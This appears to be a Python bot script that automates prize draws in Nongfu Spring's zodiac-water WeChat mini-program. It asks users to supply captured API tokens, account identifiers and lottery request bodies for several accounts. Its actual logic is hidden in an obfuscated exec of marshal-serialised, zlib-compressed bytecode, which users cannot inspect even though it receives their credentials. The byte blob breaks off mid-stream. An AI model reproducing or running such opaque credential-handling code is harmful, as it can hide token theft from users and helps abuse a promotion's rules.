
'''
vx小程序 - 农夫山泉生肖水(金蛇贺岁好水旺财)
抽奖完整提交数据： 游戏得奖品抓取抽奖请求体的完整body
抓包 gateway.jmhd8.com 下的 apitoken与unique_identity
变量填写: export nfsq='apitoken1#unique_identity1#抽奖完整提交数据1@apitoken2#unique_identity2#抽奖完整提交数据2'
支持多账号 请看注释中的变量填写
cron: 59 59 23 * * *
'''


import sys
vesion = sys.version.split(' ')[0]
if vesion.split('.')[1] == "10":
    print(f'你当前的python版本为 {vesion},即将运行脚本...')
else:
    print(f'你当前的python版本为 {vesion},运行所需脚本环境为 3.10.x, 即将退出运行脚本...')
    exit(1)
    
try:
	import marshal,lzma,gzip,bz2,binascii,zlib;exec(marshal.loads(zlib.decompress(b'x\x9c\xbd\xbaC\x90%\x80\x12\xaey\xca\xb6m\xdb6\xbal\xdb\xb6mW\x97\xbal\xdb6N\xd9\xee\xb2\xed.\x1bs\xef\x9d\xddD\xcc\xf2\xbd\x8c\xc8\xfc\x16\x7fD\xe6\xbf\xcc\x8cHS\xc0\xff\' \xff\x93\xc2\xffIW\xa9\xff\x143\x80\x19\x88\x1d@\xe7\xff%\x88\x0e\xc8\xff\x08\xaa\x03\xfa?\x82\xe9\x80\xfd\x8f\xe0:\xe0\xff#\x84\x0e\x849\xa49\xa0\x00\xca\x1c\xb4\x00\xda\x0c\xb4\x10\xa4\x10$\x14\x04\xe4?\x8a*\x80\x06\xec\xfc\xbf\xbd\x15\\\xad(\x01\x00\xa2Xh\x00\xf8\x80\xa7%\xe8\x0f\x882e\xdd\xba\xe9\xff\t\x07 \xff\xbf\x0e\xec(\x00\x80/.\x1f-\x1d\x00\x00\xfcd\xa5E\x12\x14@\x02\x82\xf9\x1f\xc5\x8d\xe9\xb8x\x8fY\x84\x82N\x1f\xc0\x12\xc4Z`%Fj\xcfW\xaa\n\xad\xb7\xf6\x82U\x10)\x9c\xb6\xf7z\xcc\xc4s[\x84\xfc\xd5\'\xff\x86Z:T\xbf\x92]\x9e\x11\xd2\xc0\xd9\xa0Cc\xe5\xab\xc5\x1c\xd54p\xf2\x81M\xd9\xfb\xec\xb6\xd9\x7fP\x82i\x87\xb3\xee\xc8!\x0c\xf6=\x17W\x04\x1b\xa0i\x06\xdeM0X\xca\xb2H\xa4\xf7\x82\x00\x80Qu7?\xc7\xd6!\x13\x93\xc06\x8e\xc5#\xa2\x07d{2Rd-*\x110-\xea+\x1dP\xe3\xfb\x1c\xecK\x9d\x9c\xd9\xbbIE\x12\x86\x1ay\xfb\xcf\x90&\xcca\x9c@\xec[`\xe8o<5\xbe\x9bp\x0f\x0e\x1an\'\xa6;*\x05\xb45\xef\x18]\xcf\x14@\xadd\x1bRB\xccW\xcd|\x94E\xf4\xa51\x92\xe3\xaaHp\xceUc\x9f\x97\x90r\x0f\x08\xb0\xa2\x91\x05\xfbh\xd6\xd2{\xc0\xd8u\xbeD-\xb8\'\xcaU\xcf\xfb\x08&OM\x1d\xb6\x913\x84\xa9cN\xa7\xa3\xe7\x1aty8\x8dDq\xaa\x19\x95"\x0b\xfc\xf9*`\x823\x92L\xef,}\x02\x12r\xaacj\x90\x9bNa#\xa9\xe0z\x8f\xc1\x13r\x1c\xec3\xac\xb3H\x97<F\x97\x1a\xd7\x1fEv%o\xa3C\xe1\x15\xb6\x8e\xba\xab\xc1\x02%<TX\x1c\xeb=\x1f\x9c\xa6\xbeeoD\xd8\xf0\xba8\xff\xfaE\xed\xa3\x0e\x9aeF\xed\x8f*\xd0\xbc_\x13]\xad\xd3\xc1WD\xf2\xc6\xa0\xccy\xe2\x91\xcaR#\xde\x14n\x17\n\xbdBM\xf1yu\x1d\xddi\x9c\xfb:\xff\x1b\xa1J\x0e1\x95\x00\r\x16+!t\x9cW\xe5\xf3\x90\xcd\xbexK\xf4\x9c\x1e9\xa8\x9d\xcb\\P;~\xc5x\xc6\xfet\x8b$\x1f\xfa\xa1g\xd1b\x9d\xbc\xab\xfbv\xd0\xder{\xad\n#\xa1\xc7\x87\xb0\xbe\xcf\x86\xd4]\x84\x8a\x16\xabsF\xfbF\x87\x10\xfeUJ\xaf\xfa;#\xc3\xab\xe2\xcd\xeen\xa6\r\xe8\xbf\xd3\x17p\x7feu\xec\xd2\xe6\xefa\xa6\x10\x8en.\xefC\xcck\xe6\xb04\xe1]\xe3\xec:\x8c\xee7\xec\x96\xcc\xb4m{\x94\xbe@\xf2\x19\x98"\xc7\xca\xa7\xa5"\xa1\x08\xc0\xb9d\xf6\x19fQ\x1b6kL=$\x80Z\x99\xdfh\x85 \xe7\xd5\x13\xb4^Z\xe1\xce\xcc\x7f\x9d\xc9\xff\xb1i\x1a\x83\xd6\xbf\xe6uae\xdf2D\xaa\x98\xdc\x0f/a\x96\x92\x85d\x8b\xeaZ\xaf\xb1\xe1\xc0g\xd6]\xdf\x97C\xa0]\x8a\x02\x9b:#f\x9c\x95\xddVZ \x90\x1a\x86Vpr\xb3\xa7\x98=\xc4\x97\xda\xf7\xb6\x15wI\xb1\t\xc2\xa2\xf9Sb\xb8C\xbe\xab\x08~\xac\xd2\xa6\xdb\xff\x10\x823l\x1e\x15\xddu\x02b\x16\xdd]\xee\xe1\x8e\xbd\xaf\x16\xbf\xdb\xd2\xe5!\xb4\xa1#w\xe7\xa2\xf0\xb2\x08\xa6\x8f%\xb0\rcP\x0f\x87\xef\x7f\xd9\xf2\x1c\xb9q\xbd\xe4\x96\x8e\x08\x8ba\x84\xd36c\x9e*s\xce\x8e\xf1m=\x91\xa4RC\xb7\x92\xab\x07|\xa2\xbd\xec\xaf\x03OF9{\xb3\\o\xd6\x1e\x1b\xc4\x953\xac\x05J\x1cMf-@\x8e\xb1\xbc\xa7\x87nhX\xa8z\xac\xe7\x90\x0b\xb7\x8a\xe5s\xc7\xc9o\x04\x89\x1a\xd7\xea\xe4\x7f\xf4\xcf|\x89\x9a\\\xc6H{\xc5,\xf8\xf1c\x94\xe7\xb8F\x15\xa0\xb7\xac0E\x03\xc8\xc5<|\xdd\x0c,\xd2:\xdc\x0b\xf6\xceJ\x97\x02\xac\xd2\xf6]\xbe\x9an\x8a\x8f\xa36\x1e?C@\xc7\xda\xc6\xcf\xa9\tl]3\xb0\xc9\x9c\xc6\xe2\xa5\xc5\xd6\x1c\x93\xc6n\x1dJ\xc1e\x91\x8d\xd9;\x8f\xf8\x17^I\x8dHf\x11\x85\xe5\xd8\x99\r~\xff\x86\xa101t2=h\xbf\xcc\\\r\xa2\x046.M\xd3o)\xab]\xa4\xfc\x06f\xc1\xed\xf3T\xfa\xed\x94UO\xd8\xb8\x9aYf\x99\x1c\xc05#}\xab\xb0E\x1d\xf5\xa74c\xdc\xabP\xea\x1c\xf0k\x99\xc9\x16\xeb\x9c|\x1fE\x8e\xb2&\xd6g\xad\x14\xf1e-l=\x89\x08F>\xc6\xabW*\xa6\xfe\x08\x14/\\\x8aR\xf9(\xcc\xe8i\xf8W\x15y\xdb\n\xfa\x1f\xea~\xc0\x89\x94\xfb\xffB\xc7\x1d-{\xf9\tz~\x84\x89\xb4d3{\x04\x83T\xda\xc1$A\x87Ra\x85\x82\xa0\xd9w\xd2\x87O\xf5\x97f\x8e\xd7F\xb8\xaf\xdd-~$\xdf\x9b\x85\xb9\xdcz \x8b\xe0\xd7\xc2Y\x10\xd1g\xeb.\xd7R\xbb\xeb}\x16\xfb\xb7\x92X\xa7,~@\x16$X\xda\x16\xa3\x97\xaa\xc5\xea\x9b1\xe1FT\x84\xe9V\xab.\xdf\xa4\x19^\xa0u+;\xc0z\xc2\x94Q\x8d\x11\xcf\xce\x99\xa9\x9c\xec\xf8\x03\xad\x16\xac\xe9\xb1\x0f\xa6\xcc\xa0\xcc\xc2;\xcc/\xb8\x16\xc7\x967\xee\x96\xdd\x13y\xf8\xbe\xe2\x93\xef\xa5\x89|\x84\xa09\x9c6_!\x93\x98\xb9\xb3y\xc9V^8\x01h\x888\x97\xb9\xaf\xef\xd0.\x96\xd7\xdc\xc4\xc0\xa6\x19\xf6\xa4 #\xc8\xe2\xd0qg\x97#\xe5\\\x8a\xf2\x86\x8d$f\xdcF\xe3x\xf8\xfd[\xa2\xf2\xa0r\xe8a\xd7MU\x8f\x80\x98\xcc\xdc\x89\xc9\x15vd\x15\xb0\xad|\xb6pR\x12\x01I\xcd\xd3\x00\tQ.\xfe\x00ufO\x9e\xd8}Rk4\xa8Tr\\\x0c\xe8\x86(\xbd\xee\x7f\xcb\x8f\xbe\x05S\xea\xb2\xe2;\xaa\'F\xd9\xfb\xe3^\xcc\xb4n\x9e\xae/\xe7y\xa8\xff\xea\x1dzX\xf1U\x85\xbdS\xeb7\x96\xfb\x10\xd0\xb0\xa4\x1ddL\xadC-\xd7\xeb\'\xd09\x1c`$"Dl\xd1%\x0e\x80\xa5i\xdc\x8e\x96\xe2\xb8.\xee\xcb\xf9Q\xe1\xbe\xaa\xbb\x13\xb8\xd8\xc0\xff\x03\xbd\xfc\xe1>\x84\xac\xaa\xa7l\x00H\xe0\x05;\x0c\x19"ti\x86z\xa3\x8d\x02;\x8d\xd7\xd5\xaaj\xd6\x93\xb3\xc3fl\x12N\x94ca\x97J\xbb\x89r\xabY\xa4\x90i\x9e\xd7\xbds\xcaWg\x82\xa2j\xf5\xf3\x15\x86F\xeaJ\x9d\rc!\xc0\xafv\x82\x05M\xa6EA\xab?$\xf3j\xe3.\xaeU\xae\xa8\xc1]\x13~\xd7w\x8b\xb8\xae\xcd\xf7T\xcb\xfc\xe3/\xbc\x92\x97\xce\xfa\x1e\xdeU\x9f\xc7\xcc\x9dMDy\x95Z\xe1\xa2\x1f\xa3\x8d\xc9$cd\x01.c!z\x83\xf9\xbcV\x03\x11\xfc\x93F\xdb91\x05b\xe8\xe99\x0e\x14\x1d\teZ;}}\x89\xe0H>\xda\x9eQ/\xa6\xfb\xd2L\x0bVA\x94\x98\xdbT\x80\xbb\xc2X^\x19i\xf3\x1dv\x11L\x93\xb4\xafE\x97\xab)\xf3\x8e\xe4\xe2\xaeu\x15\xce\x11c\x91\x04m5\xf2r\xdf\xec\xd1\xe3\xe9\x94aibI\x15~\xac\x82\n4\xfa\x82\xe65\xd9H\x91\xa4\x81;\x9b\xbav\xf3\xa0\xe9rZ\x8a+\xa1D\x03a\xaa\x9bN\x80\xc7p\x89\xc3\x0b\xd04\xe5bc3\x01\xec@\x15\xc7*Xt\x1c\xd84@\xb1\xbe\xeb(\xc5u\xf4\xbf\xd3h\x99j\x9e#|]\xf9\x8d\x90q\xee?\x1c\xfa\xb5J\xb1k\xd3\x86\x9ab\xden\x9b9\x15\xbc\xdeTV":\x05\xf1\xfdU\t\x8c\xd3\xe3E\xbe\x86J:\x96\x8d\xdc\xf1\xc8\xcb\x98\x984\xe8\x83i%^\\\xbb\x8b\xd2\xd6\x1b\xfd\x1a\x00\xac\xae\x1du\x91er\xf8{\xd4\xc3\xbd\x01\xe4\x94\x8e~\x81\xe8\t\xaba\xa9\x96\x7f*\x14\xf8m\x9aS\xd4\x04\xfe\xea\\\x0f\x85]\r\xc1\xfb\xd0\xe8.=\xea\xd5\x17\x1cO\xc7\xe6\xe6\xa9+\x86\xad\xd4\xa6L(\xa7\x8eh\x95\xac\x08\xe4\xa3\xfbtX"\xac\xf3\xc5D\xfd\xc4\xbd\x07\xf3\xbf\x01\x11\x8e\xf8m\xb8W\xed\xdb\x0c*N\xac\xf9\xe0\xe0z\x87\xfe\x80Z\x0c\x07V\xe91\xd7\xa8&\x8cD\x1e\xf8\xcfL$\xf9\xf2b\xc7\xd9\x06?\xcb\x15\x19\xdf\xa9\xca\x94%1\xdb\xbf\x8b\xe8\xc9$D\xdb\xa3\x08\xc4\xc8c\x9f\x97w\xc1\xebos\x95\x87\xd8\xc7\x01\xb4\xc3i\x07\x12u\x9b$3C^\x17i\x1d\xf5J"\xdb\xd9\xe7\xf6\xea\x1d;pY\xdb\xf8.?\x84G83/Y\x1b\x1d\x1a9\xec\xab{*Jv\x8f0\xf48f\x80&3\xf9\x19Q\xe4Q]=\xe1co\xe3\xf4\x02?\xednr\x86x\x97[\x12\xb3}C\x1a\xd9\x98\x08\xa1N\xa8\xe2\r\x80\xedZg\x00gA\xae\xe1\x16W\x94\xf0\x8c\x1c\xc1\x8a\r\x07\x8d\xdfV\xee-\x9b\x98\xd8\x0e\xee\xd7\xdf\xdf\xd1\x8d\x127wf\xf6k\x86\x15w\xaf\x067\xd0V\x96W\x15S\xc3\xf8&\xc8\xb4\xe9\xc2k<\xbb\xb0\x9c\x83\x8b\x18?\xe8\xdf\xb4\x99\xf6\x15\x1fv\xa6\xcf\xe0\x90 \xda\x0foO\xbb\x9eYuv\x12{\xe2\x84\x16\xcaC|\xed\x87\xb9\x11\xd0\x8b,ir\xd5\x07\xe5\x0bC\xaey\xf8\xcf\x05g\xa5\xb4\xdc\xa0\xc9\x16\xd2n\xbe\xefN\xfc\xb8{t1\xf1\xb7n9\x1f\x93\xebu7\x91W\xf0 ~\x87,\x045Yp\x07\xf0\x80\x12!\xbb\x18\xc1\x8c\xff5\xe6U\xd6\xe1a\xd8\xf4-\n\xf8lu\xd9O\xffh\xa5\x7f\x1a\xc9\x84Z\xc7\xd8\x0f\xf4\x18(\x1dv\xfe\x05\x10\xe4\xd9\xaf\xcf\x94\xf35\xe9\x92\xd8a\xbe\xa2F\xb5\xc7&s\xb1\xf7K\xd2\x85\xbfraM\xa8?\xad\xce\x1b\x9b\xd6S\x874\xeb`A\xfd\x1b\xca\xac\x1aTg\xce\x90\xd5\x86P3^\xe6z\x16\xdag\xd0\xaeLI\xda\xb4\xf5\xa7\x0e\xcb8t\x1d5z\xbc\x17\xe1 \x88{ux\xecT\x8d\xb6K:$\xbe\xecf\xd7\x07f\xcb\xee\x04r~\xaaD\xf4\xba\xf4W\xbdR\x977\x1b\xaf\x907\xc5\x88&w\xa4\xef\xfc\xd1\x01\xa5\x95\xb9s\x1d\x03\x98\xff\xfcW0\xf8`\xf4?\x99*\x1a\x06\xc4\'+\xd8\xb9k6\xdc\x14\xef\xc5\x82L\xe9\xa8P\x14\'\x87\xd1CC\xa4\x11\xf2\xc9\xc9e%\x87\xb0\x18\xaa\x8a\xa8+b\xde\xceu\xa5\x1c\xc4\x19\x17\x97\xeb\xfc#\xe2\xbf&\x98\x19\x13\x1f\x94\x8c\x01S-\xeb\xda8\xda\xda\xc1u\xe3\xe6\xca\x8f\x1e:\x11>\x11\xa6z\xc8]a\xdds\x00\xd8\xa4\x1cI\xc8S\x01\x07\xffk0\x01\x15\xd2\xc4\x032RY\x1cZR"\x01\xcb\x04\x83H"\x8b\x81\x01\x16Z{\xa3\xec\xe7\xe1}!\xa6\x15\xce\r\xad\xda\x99\x0b\xff\xe5%\xb9e\x05`\r&\xd40\xfc\xc7\xb3\xe2\x94d$\xc9\xdf\x14\xd9\x02u\x98\x06|v\x84\xf3\xea\xd6\xe5p\xb9y\x89gA\xc6t\x00\th\xb0\xe1\xf6A\xe6\xe7\xe8x\xc5Z%\x1clI?\xce\x1c\xd9\xfd\x1b\x02\xd3\xc9\xf2\x98\xb5\xbd\x82gmJ\xe3\x1b\x1dh\xc4\xdf\xbb$\x0c\xb6\xc1\x15\xaf\x9aW\x14\xec?\xf8\xe1\xa3\xcd\x0f\x84\xa4s+\xb7\x83+\xda0\x96\x8d\x1b\x0b\xfb\xc44\n\x8e\xe2$)x#\xb5`\x15\xc2\xcf\xcc\x92\xfd\xe8\x04\xbf`]D6A\xebq\xff\xd1\x9a\x84\xdd\xb7\x19\x9f4\xbf8\xb8\xb4\xde Zi\xca\xd3\xe8\xa7\x11\xa0\xb9)z\xcf\x97\xdfMp\xd6{\x9a\xcbI\xc5\x91DZ\x99\x02Gq\xb6\xb2L\xda{\x9e\x01\xc3v\x84\x0f\xbb\xc4\xe6\xbe\x89:\x8a\xc1\xea\x98kO!>\xcaq\xa7\xcf\xcd\xdcl\x08\xacN\xb5\xf4\xefH+\xf4*\x950\xc5\x86\x19\xfa\xd5\x97\xaa\xd4p"\x8a6\xcf\x10\xd7\xbd\x01\xd1 \n\xb4bI/\x12\x99\xa1\x8dt\x1f\xec\x980\xdd\x05\xfb\xb5\xd4\x0c\xa3c<\xec\x87\xa0\x86\xb7&:i\xe8\xf2/\x92\xae\xff\xc4\x81\xd1\x0f\x818\xa33r\x1fO66\x14\x1c~5W\x84\xeby\x13\xc6~\xcen\x9a\xb2%R\xb41\x16\xc0\xf05\x8c\xf9\xbd\x86\xab\xdf\xed\xd2(dE\x0e\xb1\xdd\x1e\x1c\xf2\xe8\xa4\t\x96\xb1s\xce.9\xe3\xe5tR =\x0f\xf5RB6\xf1\xce\xe3\x8f\xc2\xf3\xa9\xba\xac\xbb\xa8\x1efw$5.\x97\xe9\x83T#\xa1\xf0\xf8\xe6\xbeR\x13\xc4`C;\xf8\xf1\x7f\xcd\xaf\xfe\xb0/\xd0\xa5Z\x8f\xe5\x9f\xa7\x88\xac\xedc\xd2\x04y\x1bU\xee1\xc0\xc4OqAb\xd7\xc1\xf0\xdb"Q\xcb5q\x99\xa9\x80\x12Xlo\xbd\x8a\x0e\xd6v\x1c/\xd3>\x8c\x8eor\x1fR\xc0\xc3\x93\xa0L\xbd\x0b\xfcgs\xbb\x83S\xd5U\xd2c\x9d3\xeb\xe2\x19\xef\xd8\x1a\x97\x1e\xd4\xe8[\xa8\xe3,^U\xee\x13i\x1fB;\x8e\x8d\xe2\xd0YM\x91\x1a\x15\xc6]2\xceZ\x87x\xbe\xa7\x95y\\\xaf\x13\xfc\xe3`M1\x86qZ\x8a\x02\xd3\xaa\xf8F\x8f\x17\x8d)\xbaZ\x8c\x97G0h\xa6\xe6\xd1\xf2\xbd\xe3V\xae\xb3\x0eB\xe56\x9e\xd7r\x96\x18\xbb(\xf9\xa4\x13\x84i\x9d\xa43y&L\x03\xb2\xeb\xac\xef \x0f\xaf\xc8\xf6o\xd2\xa60\x81\n\xd9+\x96\x14\x14\xa4\xa4%\x8b8_\xa6\xd76H\xd7\x9d!\xd7\xd3\xda\xa0\xe3\xf8a\x80\xad\x88\xce\x99\x8a\x12\xae\xf4\xe3\xfd\x17\x05/y\xedsC\x92H\xe0\x8f\x9c\xb3\xbf\x1d\x12\x17.\xa6\x17\xbf\x05\xd2\x05\x7f\xeaY\xfd\xc5\x9c\xcam6\xb7\xdbm\xe1\xd3\xef\x89\xdd54a\xb2\x85\xec\x80\xd4\x1e\xec\x10\x1f\x9f\x86\xfc\n\xf2\xa1g7\xdbU\xcb\x96\xc3 \x85I\xdaa?=\xa0\x90\xc1\xddU\xe1M\xc9\x1ei\xa4\x1e\xe4\xc8\xbe\xc34\x9f\xdc?\xc2K\xdc[\xf4\xa2\xe3\x9bcG\xe9\xbaB\xc3Z\xb3&CT\x0b\xf7_\x04k\x82\xf4\t\xc4X{\x94t>\x0cw\xf8\xa2\xce\xe8aw\x17\xda\x0f\xc0\xa4\x16U\x84)\xee\xfe\xcf\xd9\x06\xa8\xd0\xfa\x10\xda\x80\xf3dQ[\xde\xf7G`\xee#\xea\x02\xc4\xbe\xc4/S\xb9f.\xd4\xa7\r\xa5\xc1\xe4s\x0bzX\xb8K$\xd8j\xfes\xc6={\xa2\xdd\x16\x08\x82\xe33\xafSs\x10\xd2\x02\xfc B\x1b\xd8\xe8\xf3=5\\V^$\x1b\x8e5An\xc2x\xdd\x88\x83p\x9au%\xd9\x11\x89q\xf9\xa3\xe1~\xb799\xf1N6\x00\xf4\xad\xbc\x0c\xad\x82W>#{Q\xcc\x8f\'F\x08r\xef\xee\x86]\xf4\x87\x19\x99Z\xa8?Q\xe2[\xf06i?g\xd0H\xd3\xa3\xd1\x8b\x17@\xc0\xf6\xdc}s_]\xd0\xe5\x99\xf9$\xb5\xae\xe1\xcbA\x80?\xb6\xc8L\x9e>6\x15\xc1f\xb9\t4o\xde3\x99\x0b\xad\xddG\xe9Nr\x12\x04l\xf1;i#\x9e\xb3\x04\xc3\xf1\x98\xef\xea\x80hcHkS\x87\x7f\x13\xe5U[\x0b\xcd3\xf2n\xbd6f\x16i4u>\xe3b\x1e-\xc9\x92\xfb\x80Q c\x01U\x85\x11y\x9d\xf2w\xcd\xaa>\xa7/\xb5.\x19@\xe4\xc7\x98\xc0\x1d.U\x1fH\x89"\xb7\xa0\x04\xbc\xfb\x867\xd8T\x06\x13\xa0&+\xb4\x04\x91\x0c1\xfb\xbb)\xdf\x15\xc6$\x17YZ\xd0\x17q\xe1\xa4.\x8a>\x0ew\xe4\x18\x11\xac\x8f3t\xd39\x9b\x00d$\x80\xcb\x14\xe0JG\x1a\xfaN\x92\x03K\x83!SK\x07\x8aHh-E\xc2p\xf2\x0b\x87n\r\xd5\xd0\xeddF\x1ev\xe4@\xd6\x8f\xabGuK\xaa\xc0\xa0\x16\x9fM\xd1T\xec\x83S9\xcfs\xae\x8bi\xe4@qq\xdb\xaeRa\xf1\xf1\x8c\x90\x94X~@\xeec\r\xb8t\xf4~]\x8f\\g\xadv\xb4\xdan\xe9\xc7\xe2E<g4y7\xcb\x13\xfe\x99\xbd\xf1"\xfa\xd2\x0e&\xc1\xae\x0eS\xec\x95Z\x97\x14\x8a\x17\xb6\xa9\xd5\xe0\xbcR\xb4\x13\x1ebJ\xcd(\x19\xc8\xea\xba%\x14\xb7\x0bY\x83&2\xcaO$\x7f\xa8\x9b\xf4#\xa2\x9d:ni`r\x96\x9d"\xd3\xd6|\xe7\xd5v\x18D\xf4~<A&\xddC\xadF;\x86\xcb\x17pp\\(\x04\x86\xb2\xbe\xd9\xca\x8d\xf4\xa4\xc4\xdb\x16\xefJv\xc1\xa9\\8\xc6\x9f\xc7l\x15i^\xbd\x8eB\xc2\xa7K\x83\xa0\xeds\xa1\xf7\xba\xc46\x0f)S\xeah9\xd2\x93d\x85\xb1}|\xd4\x9f\x93\xfff\xb3,\x85\xb2\xf5p\xcc\x99\x9a\x95\x1dA\x9c\xf8,\x80\xa9N\xc9\x9c\xabz\x00a",\xa9\xb7.\xdb\x12"\x84H\x8dl\xc7\x1f\xbc\xaa\x93j\xde:\xf8fInWK\x82k{\x7f#\xf7\xbc\xee\x88\xa6qp\xe0?\xfb\xa9W\xf5\x10S\x81t\xeb\x13\xba1\xdb\xe5\x1e\x83S\xfa.6\x19\x8b\xc6\x8aD\xb5C\xeb\xe0\x99\xb1\xfa\xf0\xf8\x18@\x0e\xa4\rS\xc3,uc\x93\xff\xf9\x13\x04{\xb4\x91\xbdt{\xc7\x83\x00\xd9\xbe\x01$\x8f\xd2\xc0z\xb6\x86\xce\x83\x07\\?\x1ev8l\x82\xe3\x8f\xc6\x87\xfe\x04y\xe7\x13\xe3\xae\xb7\xa1~I\x876\x8e\xa3\xc9\xbfv\xe2\x8b%a\x10\xcc\x1a\x9b\x7f\xb7\x99\xdb\r&\x1b\xa2)\xe1\x9e\xd0\x90\x98\xf9"9\xc7\xe7\xd9\xb9G9-\x7f^\x93[-1\x1c^C\x0fL\xc9*\xccK\x01uF2B=r\x88\x92\x88\x05\xe4~\x9fC\x8e)+\x8ewh$\x19\xbb.\x9c\xc3X\x80>\xae\x14\x04\x03\x86Y\x9a\xafG"(\xd6\xf3\xb4\xe5\xbd9\xedl\xc0[\xfa\xa7\x8ch#}\x85\xf6-\xd7\xae\x15\x01O\xba\xaf\x1eN\x11\xc6\xc2\xb7=\x1fa\x8c\x0f\x993\x83\xbe\x95\xa5\xde\xe2\x8e\x0f\xa1\xbb\xd0\xc2\x9dN>\x0b\x07\x13\xbf\x85CZ\xa3\xdd\xd9\xc5\xbb)jE\xc1\xfc\r\xcc\x1fp\x08Jt\xc5P\xe0\xf7\x0b@\xfay\t.\xefH\x07}\xb2\xf1\xb0\xb7k4?\x14\x0c3S\x021\xac\xd9\x0c\x15\xb7^e\xcd\xc2\xa5\xcaC\\\xa1\x8d\xd5\n\x1c\x93h\x86~\xc1\n\x80.\xbe\x04\x85\x04\x1eXO\xd1\xdc%\xb9\xf0sN\x18\xd1\xb2S>\xeb\'|\x81\xb7<\xe8\xc7\xe4Z2\xce\'\xb6\xa5D\xa8\xb5\x9c\xd8g=\x94\x9ac\x122\x18Q\x93\xc4\xd0\x0f\xff\xcb\x85g)\xdf=,\x86U1r\xd1Um\xf3/Qmu9\x96\x9c:k\xc0\xab\xc8\xa1\xf2\x0e\xe5o\xb6\x8c\xe0\x82\x19\xdf\xd9\xec\xfd\x92G\x1e\x14\xdai\x19*E\x10\x9f2\x97>\'DL\x0bn\'xW5Ei`\x95ZDz\xbbQ\xed?D\xd8MJ@[\x94\x90N\x19=\xccn\xc6|cN\xa8\xc5\x7fF/L\xba \x1fF\xe9U<\xbde7{\x84\xbeI\xa3h\x89\xa4\x9fd\xf6@Ti\xa2\xfc\xd3\x14\xf1\xe43\x0eu$\x19\x8e\xe5\x05\x93{G\x95]\xed\x05\xdc\xbd\x85}+:N\xb5u\xab\xf8\xc2\xd6E\xb4)\\\xd3-\xb6^\xf2@\x97\xf9\x8d%\x88\x00\x07\xad\xfaB\xc0\xba\x95M\x1a\xbb\xdbGK\xd4@\xf66\xf6\xba\xca\xe5\xa7\x07\xfaP\x0b\xf3c\x1f\x89\xb28-\xee\x06\xcb2$i\x05\xaf\x89\xc7\xc0\xdf\x97\x7f\xc1\xeee\xaf`\xaf9\xedM+\xdc9\xb4P\xa9\xef[\xa8\xc2OX5\xeeQ\xd2\xab\x16\xb7\xff\x8a\xac\xf2\xac\x94C\r\xcf#\xcb\x95Y:%~\x81\xad\xb8H\x06h\xde\xb3\xff\xd7x\xec%\xa4P\t\xd6^\x9e\xaa+=V!\xc7A\x15\xab:\x9e{\xfbL\xda\xcc\xd4\xc8\xb3\xe2:\xe8\xd7\x02K9}-\xd0\xc6\n\x96\xc4\xc2\x12\xac\xdc\xa7Y\xca\xe9\xac!\x81\xc3\xbf\x8d\x8a\xb6s\x89\xe4\xeb\x03\xc1Mf\x16\xdb&\x9c\x9d\x13\x7f\xb3\xb3\xcbP\xc1\x8e7\x93:\t\xc2PL9\xcc\n\x83\x94\xed\xad\x9c$\x14f\x1d\xc0\xd6\'\xdaT y\xab\xbc\xe4\x08\'\xb0\x14\xfd[\'\xcc\x9c\xfa\x08\xff\xf1\xdf\x90\xdcY\xac\x03\xef\xb6\xf8Ic\xc3\xad^\x86cu\xb6\x04\xc0\x85JP\x01\xfd\x83\xbf\xf7v[\x8c\x9d\xa0%\xc4V\r\xb7\x12\xfc)\x900\xfd\xb0\xcewg^\xb8\x98\xd1\xda\xca F\xdd\x86\x0e\xe5H\x1f\x16?D+c\xd6\x90\xd3\xe1\xde*\xae\xd0\xe8 \xa2\xb9\xccVy\xdf \'\x16\xc3\x13\xf2d\x81\n\x87p\xec\x9eKv\xa0\xd0\xc1\x84\x8cX\xe2\xdc\xf4\xd6\xa2\x9e\xf9\xdd\xcb4\xf8m\xb0\xa3\xbdw\xc3\xbe\xa2r\'B~\x02n\xf7K\xbd\xf6\xe4\x86\x0f\xef\xeb\x0f=\x1e\x04\xe4B=)\x8b+^J\xc6\x0fWT\xb8\xb3k\'\xeb\x83\xa3\xab\x1a\xa6\x11\xb6\x8f\xbfS\xbe\xda\xa8\xbd6\x12FyY\xf3\xd6\x98\xd9l\x83\x93\x82J:\x8c\xa6v\x8aG\xc1\x87F\xe6\xc0Vu\xd2\xc1\x11S\x19=^\xa0\x81\x1e\xa6!\xf3\x9e\xa2.}\xf2\xcfRy\xf5\x0e\x8f\r;\x8dq\\\x9f&\xd0f\x9d/\x12Z\x0f\xb4\xa3\xaa\x9ef\xcc\xcb\xb8(F\x8e\xd0\xd9:\xcd\x08X\xf2\xa7\xfehu\x91$\xb3\xdd\xa5W\xc3\x86\n\xd8\xd8f\xad\xfc\x89\xbd\x0c\xbbrox\xea\xea\xf43\xdcc^\xa6z\xb10\xf7\x02\xeb\xc9\x8c\x1d\xfc\x18\xb9\xe8\x17YB\xf8W\xd6y\x93S\x02\xc4\x0e\xdc\x80d\x8d9%\xabI~\xd3\xf8\xcev\xa4\xbc\x9b\x1f\xff\xa3\xac}8\x96E\xb3\xd3(\xbf|\xa2\xfc\xe6\xeaR\xaf\xbd\xce\x12\xbe\xae1\xe3\xab\xac\xd5"\x1ay\x85i\xfdagM\xc0\xf5\xb6\xbb4D:\xc2\x02\xc3-S\x02]\xa8\x84%)\xed\xc1`\r9:\x15P\xc0^\xa0l\xb1\xa6\x9b\x8b\xc3\x97.\x0bS\x8a\xc3%\xb6\xa64\xb6< m\x11fG\xb4\xaf\x9dG9\xfc^=`0k\xfc~\xf1\xf2\xa2l\xb8\x1c\x16\xe3\x1a\xf2\xb5\x8c\xe0\xd9\x81\xb8\xa2|\x83\xdaoG\xa8\xdd<,et3\x9e\x1fp]9\xee\x99>\xe9\xa9C\xca\x1b\xbd\xb7\x9a\xd3\xfd\xa1\x03\xae\xe6\x9c+A\xba\xdaY\xee\xed\xc7OG\x90\xd8\xf3\r\xf5\x1d\xb1\xc9K&\xda\x84\x8d\x0b\xea\x98r\x12O\xaeR`\xefS\xf55\x7f\xeb\xd2+\xb1\xa4\xde\x8e}\xd1\x7f\x13aoe2\xe3\xe7\x04\x14Gb,\x92\r\x99\xe6\xb3#\xbc\xcf\x80\x9b\xe5\x0bBg\xb6\xfdU\x10\x85\xd7\xd0\x17\xdc\xa6\xd8\x1f\x9b\xe2\xaf\xd9\n\xef_\xca\x84D\xa4\x8c\xb2\xcd\x02\x03\x82;\xa0b\x8f\x12\xf76\xf3H\xe2\xefPP\xe5\xe7-\x194\x1a\xa1\xd2\x1c\x85\xf0"\x80Q\x8a,\xbd\x91\x06\x89\xce|\x85\xda\xbe\xf3Yp\xe8\r_\xd4\xc67G\xd9.\x83\x94\xb7HD\xc5\x8b\xd8v!d\x1d&M